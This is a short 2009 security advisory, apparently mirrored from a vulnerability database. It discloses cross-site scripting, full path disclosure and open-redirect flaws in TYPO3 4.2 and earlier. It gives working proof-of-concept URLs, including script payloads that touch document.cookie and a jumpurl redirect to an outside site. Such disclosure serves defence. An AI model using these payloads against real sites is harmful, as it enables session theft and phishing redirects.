Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22867
HistoryDec 04, 2009 - 12:00 a.m.

Vulnerabilities in TYPO3

2009-12-0400:00:00
vulners.com
5

Hello 3APA3A!

I want to warn you about security vulnerabilities in TYPO3.

These are Cross-Site Scripting, Full path disclosure and Redirector vulnerabilities.

XSS:

http://site/index.php?id=49&sword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/nc/search-result/start/1.html?tx_ttproducts_pi1%5Bsword%5D=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/index.php?jumpurl=%0A1

Redirector:

http://site/index.php?jumpurl=http://websecurity.com.ua

Vulnerable are TYPO3 4.2 and previous versions.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/3558/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua